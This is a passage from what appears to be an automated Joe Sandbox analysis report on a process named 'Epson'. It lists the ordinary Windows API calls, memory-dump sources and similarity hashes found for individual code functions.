                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 121d9ecb66ba95c92c7a01180fafc372f79cbe63fdec59f05a2989d2051a9e6a
                                                                                                                                                                                                                                      • Instruction ID: f6dd2a8238c1ccc03d32295abeb7c66c140b9c18fde42b6630b0e74a9e1495c5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 121d9ecb66ba95c92c7a01180fafc372f79cbe63fdec59f05a2989d2051a9e6a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1101A2B660921A7EF66136786CC0FA7770DDF413B8B344326B521A51D1EE75AC40B360
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00FB2394
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00FB23A6
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00FB23BC
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00FB23D7
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                                                                                                                      • Opcode ID: f5b6ede5c144707cca76605fa3c539ada3fb67dd5c9dac271fb9b197ccc24ddd
                                                                                                                                                                                                                                      • Instruction ID: f98f686fd5c4a2d64e9430d50e569373821d214ec89328e305aae01a2bfe0f34
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f5b6ede5c144707cca76605fa3c539ada3fb67dd5c9dac271fb9b197ccc24ddd
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5E11093AD00218FFEB119BA5CD85FDDBBB8FB08750F240091EA01B7290D6716E50EB94
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00F5249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00F524B0
                                                                                                                                                                                                                                      • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00F51AF4
                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00F931F9
                                                                                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 00F93203
                                                                                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 00F9320E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4127811313-0
                                                                                                                                                                                                                                      • Opcode ID: c15e66b51fa9786d86e151089d90721c1d045ec3b658b11eaca432f7ed44d4ee
                                                                                                                                                                                                                                      • Instruction ID: b7cd738dd7030230c3149ae558768f81c9465b6ebe3236c28beee9294a65567f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c15e66b51fa9786d86e151089d90721c1d045ec3b658b11eaca432f7ed44d4ee
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C1116632A01119ABDF11EFA8CC85AEF77B8FB05351F100452FA02E6150C739BA85EBA1
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00FBEB14
                                                                                                                                                                                                                                      • MessageBoxW.USER32(?,?,?,?), ref: 00FBEB47
                                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00FBEB5D
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00FBEB64
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2880819207-0
                                                                                                                                                                                                                                      • Opcode ID: 662e3bbdb817eae6987c31cdf7e6d126045061beab301b0f233092dacf945d5d
                                                                                                                                                                                                                                      • Instruction ID: fa10c3e129ee3dc8cab47c82ebd71176b14ba2bf27939963c3a12b88397e5ac8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 662e3bbdb817eae6987c31cdf7e6d126045061beab301b0f233092dacf945d5d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EB112676900258BFDB219FA89C45ADE7FACAB45320F14C216F825E3280D6B5C9049BA1
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,?,00F7D369,00000000,00000004,00000000), ref: 00F7D588
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00F7D594
                                                                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 00F7D59B
                                                                                                                                                                                                                                      • ResumeThread.KERNEL32(00000000), ref: 00F7D5B9
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 173952441-0
                                                                                                                                                                                                                                      • Opcode ID: da4e960b2d6a3ae9b1c852cfb38ae2d33a4b3ccf91b1c9d892b27f68fc8939d8
                                                                                                                                                                                                                                      • Instruction ID: a1c3edfefb83f11e88dd86e1b9710d76f08c523476b44171e5eae08761176fd6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: da4e960b2d6a3ae9b1c852cfb38ae2d33a4b3ccf91b1c9d892b27f68fc8939d8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DC01F9328011187BDB106FA5DC05FAA7B79EF81334F548217F92D861E0DB708900F6A3
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00F578B1
                                                                                                                                                                                                                                      • GetStockObject.GDI32(00000011), ref: 00F578C5
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00F578CF
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3970641297-0
                                                                                                                                                                                                                                      • Opcode ID: 50d7699ffdb3a24de2749e6b207620f7be6fcfe05cc62fdec80bc2df33367716
                                                                                                                                                                                                                                      • Instruction ID: 5c430d8a02b81c9ab46573681564cafd28f81a6f22cc56f4ba00b67c8ee88540
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 50d7699ffdb3a24de2749e6b207620f7be6fcfe05cc62fdec80bc2df33367716
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8111AD72905248BFEF126F90EC98EEABB69FF083A6F140115FE005A110D7359C64FBA0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000364,00000000,00000000,?,00F8338D,00000364,00000000,00000000,00000000,?,00F835FE,00000006,FlsSetValue), ref: 00F83418
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00F8338D,00000364,00000000,00000000,00000000,?,00F835FE,00000006,FlsSetValue,00FF3260,FlsSetValue,00000000,00000364,?,00F831B9), ref: 00F83424
                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00F8338D,00000364,00000000,00000000,00000000,?,00F835FE,00000006,FlsSetValue,00FF3260,FlsSetValue,00000000), ref: 00F83432
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3177248105-0
                                                                                                                                                                                                                                      • Opcode ID: af77f9196644f2d81d4f26c1272d8fb5cb6cf7ea49aac73ceb759bbca2209f6e
                                                                                                                                                                                                                                      • Instruction ID: 6d213a50f6e14e78e0bb1b7f2c6eaf6412bba0d1ad3eaa69c67c59ad21cd38b4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: af77f9196644f2d81d4f26c1272d8fb5cb6cf7ea49aac73ceb759bbca2209f6e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B201D432A122269BCB22EA799C44A963B58AF05F717210220FA06DB190C730D901E7E0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00FBB69A,?,00008000), ref: 00FBBA8B
                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00FBB69A,?,00008000), ref: 00FBBAB0
                                                                                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00FBB69A,?,00008000), ref: 00FBBABA
                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00FBB69A,?,00008000), ref: 00FBBAED
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CounterPerformanceQuerySleep
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2875609808-0
                                                                                                                                                                                                                                      • Opcode ID: 66d796fb378338c64d5c91583a105de3e9c75d7a323440394e6d37ea84e190e4
                                                                                                                                                                                                                                      • Instruction ID: d673296dcf717ba5b34c99e5c395de1c4b365ee9168bc8acb0c3e196b37d7033
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 66d796fb378338c64d5c91583a105de3e9c75d7a323440394e6d37ea84e190e4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 82115B31C0162DE7DF00EFA6E9897EEBB7CBF09711F104095D941B6180CBB89650EBA5
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00FE888E
                                                                                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 00FE88A6
                                                                                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 00FE88CA
                                                                                                                                                                                                                                      • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00FE88E5
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 357397906-0
                                                                                                                                                                                                                                      • Opcode ID: 4eef37da3b6195fa9bb62483dfa0bcc5dc733336f54c554f5cc1cbc950b208ed
                                                                                                                                                                                                                                      • Instruction ID: 2c27e5f5f2eff539172b66a1775003b9f8da4f7c9be2a3de072e7d8f5b30f7de
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4eef37da3b6195fa9bb62483dfa0bcc5dc733336f54c554f5cc1cbc950b208ed
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 471160B9D0024DAFDB01DFA8C884AEEBBB5FB08310F108066E915E6610D735AA51DF50
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00FB3712
                                                                                                                                                                                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00FB3723
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00FB372A
                                                                                                                                                                                                                                      • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00FB3731
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2710830443-0
                                                                                                                                                                                                                                      • Opcode ID: 7ea4b99f71191332d45dbc6195d6047003c1a9ff929a764a9229ff85c9901449
                                                                                                                                                                                                                                      • Instruction ID: 7d7bbfad9e66cfa52f7601c24d0c0c0d965f037dc629209a0c69c54b4fb9a93d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7ea4b99f71191332d45dbc6195d6047003c1a9ff929a764a9229ff85c9901449
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F6E06DB25452687ADB201BA39C8DEEB7F6CDB42BA1F100019F105DA480DAA48940EAB0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00F51F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00F51F87
                                                                                                                                                                                                                                        • Part of subcall function 00F51F2D: SelectObject.GDI32(?,00000000), ref: 00F51F96
                                                                                                                                                                                                                                        • Part of subcall function 00F51F2D: BeginPath.GDI32(?), ref: 00F51FAD
                                                                                                                                                                                                                                        • Part of subcall function 00F51F2D: SelectObject.GDI32(?,00000000), ref: 00F51FD6
                                                                                                                                                                                                                                      • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00FE92E3
                                                                                                                                                                                                                                      • LineTo.GDI32(?,?,?), ref: 00FE92F0
                                                                                                                                                                                                                                      • EndPath.GDI32(?), ref: 00FE9300
                                                                                                                                                                                                                                      • StrokePath.GDI32(?), ref: 00FE930E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1539411459-0
                                                                                                                                                                                                                                      • Opcode ID: 23b5ee88be6ea1dc63562bd54920c8989eb549369aba3d2f996a5a19328a62a3
                                                                                                                                                                                                                                      • Instruction ID: 9bebc5e43874cf18f9363c2072209ca5fe73c590d48c07a92262721c6d825a5a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 23b5ee88be6ea1dc63562bd54920c8989eb549369aba3d2f996a5a19328a62a3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 13F05E31105298BADB225F95AC0EFCE3F59AF0A321F148100FB11250E1C7BA5561EBA5
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetSysColor.USER32(00000008), ref: 00F521BC
                                                                                                                                                                                                                                      • SetTextColor.GDI32(?,?), ref: 00F521C6
                                                                                                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 00F521D9
                                                                                                                                                                                                                                      • GetStockObject.GDI32(00000005), ref: 00F521E1
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Color$ModeObjectStockText
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4037423528-0
                                                                                                                                                                                                                                      • Opcode ID: a0d02d478e9846780c5df514de0d334ff082d6fa38476b716258678edd8e783d
                                                                                                                                                                                                                                      • Instruction ID: f83fb8906e8cb438fdd26d5cede2b814767b2f5fde28955b4b4275d6eb7392fa
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a0d02d478e9846780c5df514de0d334ff082d6fa38476b716258678edd8e783d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 52E06D31640684AAEB215B74AC49BE93B21AB16336F08821AF7BA5C0E0C7728640BB10
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 00FAEC36
                                                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 00FAEC40
                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00FAEC60
                                                                                                                                                                                                                                      • ReleaseDC.USER32(?), ref: 00FAEC81
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2889604237-0
                                                                                                                                                                                                                                      • Opcode ID: 15512e19ac02c061c66ce40be100d6f3bfb1b34879b28ed015d5299ecd74e902
                                                                                                                                                                                                                                      • Instruction ID: 5682b2df6535da47df7de28ab164f24e462048ee98411e7098655aee2d8e84c0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 15512e19ac02c061c66ce40be100d6f3bfb1b34879b28ed015d5299ecd74e902
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D6E01AB5800208DFCF409FA0C988A5DBBB5FB48311F108409E91AEB650CB385901FF10
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 00FAEC4A
                                                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 00FAEC54
